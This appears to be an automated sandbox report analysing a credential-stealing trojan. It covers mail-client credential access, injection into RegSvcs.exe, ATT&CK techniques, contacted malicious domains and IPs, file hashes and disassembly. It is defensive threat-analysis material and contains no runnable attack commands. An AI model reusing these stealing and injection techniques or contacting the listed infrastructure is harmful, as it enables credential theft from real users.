                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: uFzZ48M67c.exeBinary or memory string: WIN_XP
                    Source: uFzZ48M67c.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                    Source: uFzZ48M67c.exeBinary or memory string: WIN_XPe
                    Source: uFzZ48M67c.exeBinary or memory string: WIN_VISTA
                    Source: uFzZ48M67c.exeBinary or memory string: WIN_7
                    Source: uFzZ48M67c.exeBinary or memory string: WIN_8
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2956839649.0000000003295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: uFzZ48M67c.exe PID: 6768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6988, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: uFzZ48M67c.exe PID: 6768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6988, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    221
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    121
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts
                    2
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS128
                    System Information Discovery
                    Distributed Component Object Model121
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    2
                    Valid Accounts
                    LSA Secrets641
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Access Token Manipulation
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    uFzZ48M67c.exe32%ReversingLabsWin32.Trojan.Autoitinject
                    uFzZ48M67c.exe100%AviraTR/Dropper.Gen
                    uFzZ48M67c.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    flujoauditorias.cl
                    15.235.118.15
                    truetrue
                      unknown
                      ip-api.com
                      208.95.112.1
                      truetrue
                        unknown
                        mail.flujoauditorias.cl
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://flujoauditorias.clRegSvcs.exe, 00000001.00000002.2956839649.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://ip-api.com/line/?fields=hostingsRegSvcs.exe, 00000001.00000002.2956223533.000000000151E000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://mail.flujoauditorias.clRegSvcs.exe, 00000001.00000002.2956839649.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://account.dyn.com/uFzZ48M67c.exe, 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.2956839649.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003326000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://ip-api.comRegSvcs.exe, 00000001.00000002.2956839649.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003326000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                208.95.112.1
                                ip-api.comUnited States
                                53334TUT-ASUStrue
                                15.235.118.15
                                flujoauditorias.clUnited States
                                71HP-INTERNET-ASUStrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528952
                                Start date and time:2024-10-08 14:07:14 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 59s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:uFzZ48M67c.exe
                                renamed because original name is a hash value
                                Original Sample Name:8c48688d795f1ff90fa87b1eafd94190518e4a850f5a9aa265350158c85cbc62.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/1@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 53
                                • Number of non-executed functions: 302
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: uFzZ48M67c.exe
                                TimeTypeDescription
                                08:08:11API Interceptor19x Sleep call for process: RegSvcs.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                208.95.112.1X.exeGet hashmaliciousXWormBrowse
                                • ip-api.com/line/?fields=hosting
                                Windows Defender.exeGet hashmaliciousXWormBrowse
                                • ip-api.com/line/?fields=hosting
                                scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                • ip-api.com/line/?fields=hosting
                                z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                15.235.118.15RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                  Facturas de pago 003839,72011,030184.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    Lista de embalaje y direcci#U00f3n de DHL.bat.exeGet hashmaliciousAgentTeslaBrowse
                                      Cotizaci#U00f3n-538900.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ip-api.comX.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        Windows Defender.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        http://tcaconnect.ac-page.com/toronto-construction-association-inc/Get hashmaliciousUnknownBrowse
                                        • 51.77.64.70
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        HP-INTERNET-ASUSna.elfGet hashmaliciousUnknownBrowse
                                        • 15.130.64.87
                                        RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                        • 15.235.118.15
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 15.135.165.230
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 15.252.8.53
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 15.189.1.44
                                        r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                        • 15.235.206.13
                                        novo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 156.152.126.244
                                        sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                        • 15.235.85.112
                                        175e4400e2e99b0d0ac35bd3fe68519fa91f9ae5cc7a7.exeGet hashmaliciousQuasarBrowse
                                        • 15.204.213.5
                                        sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                        • 15.235.85.194
                                        TUT-ASUSX.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        Windows Defender.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        No context
                                        No context
                                        Process:C:\Users\user\Desktop\uFzZ48M67c.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):245760
                                        Entropy (8bit):6.710547254223229
                                        Encrypted:false
                                        SSDEEP:6144:zq5uGpLYCvgDi56kgReiCvVUHJgDdc0GoxflC/U2aDYV72:efCpReLgJgDK0GoxNC82aDQ72
                                        MD5:D9EC1FBF1BECDC9FC7BA61AE3491DB0B
                                        SHA1:D7639375B6C42A6DAB6EBDE69AE4A5639471C8A8
                                        SHA-256:1CE11BC47BF21761572858BCFB2A7E11AE49BE8F75EFB1CBF210F698C97391CE
                                        SHA-512:4C11080B7E88ADDDDC5753D378E1043EA2F2F91A84F9BC7733396BC5C67250F4CA34D58D13832366FDCB1D7E6BEBB57ADAE6DA888C29AD4E3D65D9DAC67022AD
                                        Malicious:false
                                        Reputation:low
                                        Preview:...0UCQFK35L..S3.LY9T49F.TY10VCQFO35L44S3ALY9T49FCTY10VCQFO3.L44],.BY.]...B...d>*"f?AZ+FU>."-7W;@.$&t+D^v*?f.|flY[7VoAT3p49FCTY1`.CQ.N05...63ALY9T49.CVX:1]CQ.L35D44S3AL..W49fCTY.3VCQ.O3.L44Q3AHY9T49FCPY10VCQFO.1L46S3ALY9V4y.CTI10FCQFO#5L$4S3ALY)T49FCTY10VC1.L3~L44S.BL.<T49FCTY10VCQFO35L44S7A@Y9T49FCTY10VCQFO35L44S3ALY9T49FCTY10VCQFO35L44S3ALY9t49NCTY10VCQFO3=l44.3ALY9T49FCTwEU.7QFO..O44s3AL.:T4;FCTY10VCQFO35L.4SSo>*K749F.QY10.@QFI35L.7S3ALY9T49FCTYq0V..4*_Z/44_3ALY9P49DCTY.3VCQFO35L44S3A.Y9.49FCTY10VCQFO35L..P3ALY9.49FAT\1$.AQ.v25O44S2AL_9T49FCTY10VCQFO35L44S3ALY9T49FCTY10VCQFO35L44S3AQ.....}.$.:4D.`.T.O.@..5.v[u,.8@..{.N....kA2.zA.V....O...E.KT?N....kSJ=WQ.C.I".D....lg;s~.2Z.I...Gf.W@g.p...er...yC@j...8..7[Th"$)]Ux.0 .A\.6.R3ALY.......XH..|E@-.^Lb....m+,b...'10V'QFOA5L4US3A.Y9T[9FC:Y10(CQF135Lr4S3.LY9c49FfTY1]VCQbO35244S.<CV...P5.Y10VCd....!...l.{...H.=.;..5...oIg.\[.;.u...H..2}.A.:@l}mK52W6CK]:X.7.....2RGTDH76@.:...x.r.....@...<.O5L44S3.LY.T49..T.10V.Q.O..L44..A.Y.T...C
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):0.20035725231316096
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:uFzZ48M67c.exe
                                        File size:80'740'352 bytes
                                        MD5:a441db009e52a518a60acf292302f8b9
                                        SHA1:7b074fd716dad974e147dee21566d37878c909f4
                                        SHA256:8c48688d795f1ff90fa87b1eafd94190518e4a850f5a9aa265350158c85cbc62
                                        SHA512:4b1814074434ee593d60de8f1218c4ae465c23973f60d76ee158fe1462c25096efb6fe8a93466e1d8f05f377626d481c89a9d2fff250df4d4307ce93ac306658
                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCDQIvkMmTJ0QAJxGboPIf:7JZoQrbTFZY1iaCDNvkMbdJioPI
                                        TLSH:6D08E122B5D69036C2F323B19E7EF76A963D75360336D29727C82D321EA05416B29733
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                        Icon Hash:1733312925935517
                                        Entrypoint:0x4165c1
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                        Instruction
                                        call 00007FB15CE3AC2Bh
                                        jmp 00007FB15CE31A9Eh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push edi
                                        push esi
                                        mov esi, dword ptr [ebp+0Ch]
                                        mov ecx, dword ptr [ebp+10h]
                                        mov edi, dword ptr [ebp+08h]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007FB15CE31C1Ah
                                        cmp edi, eax
                                        jc 00007FB15CE31DB6h
                                        cmp ecx, 00000080h
                                        jc 00007FB15CE31C2Eh
                                        cmp dword ptr [004A9724h], 00000000h
                                        je 00007FB15CE31C25h
                                        push edi
                                        push esi
                                        and edi, 0Fh
                                        and esi, 0Fh
                                        cmp edi, esi
                                        pop esi
                                        pop edi
                                        jne 00007FB15CE31C17h
                                        jmp 00007FB15CE31FF2h
                                        test edi, 00000003h
                                        jne 00007FB15CE31C26h
                                        shr ecx, 02h
                                        and edx, 03h
                                        cmp ecx, 08h
                                        jc 00007FB15CE31C3Bh
                                        rep movsd
                                        jmp dword ptr [00416740h+edx*4]
                                        mov eax, edi
                                        mov edx, 00000003h
                                        sub ecx, 04h
                                        jc 00007FB15CE31C1Eh
                                        and eax, 03h
                                        add ecx, eax
                                        jmp dword ptr [00416654h+eax*4]
                                        jmp dword ptr [00416750h+ecx*4]
                                        nop
                                        jmp dword ptr [004166D4h+ecx*4]
                                        nop
                                        inc cx
                                        add byte ptr [eax-4BFFBE9Ah], dl
                                        inc cx
                                        add byte ptr [ebx], ah
                                        ror dword ptr [edx-75F877FAh], 1
                                        inc esi
                                        add dword ptr [eax+468A0147h], ecx
                                        add al, cl
                                        jmp 00007FB15F2AA417h
                                        add esi, 03h
                                        add edi, 03h
                                        cmp ecx, 08h
                                        jc 00007FB15CE31BDEh
                                        rep movsd
                                        jmp dword ptr [00000000h+edx*4]
                                        Programming Language:
                                        • [ C ] VS2010 SP1 build 40219
                                        • [C++] VS2010 SP1 build 40219
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
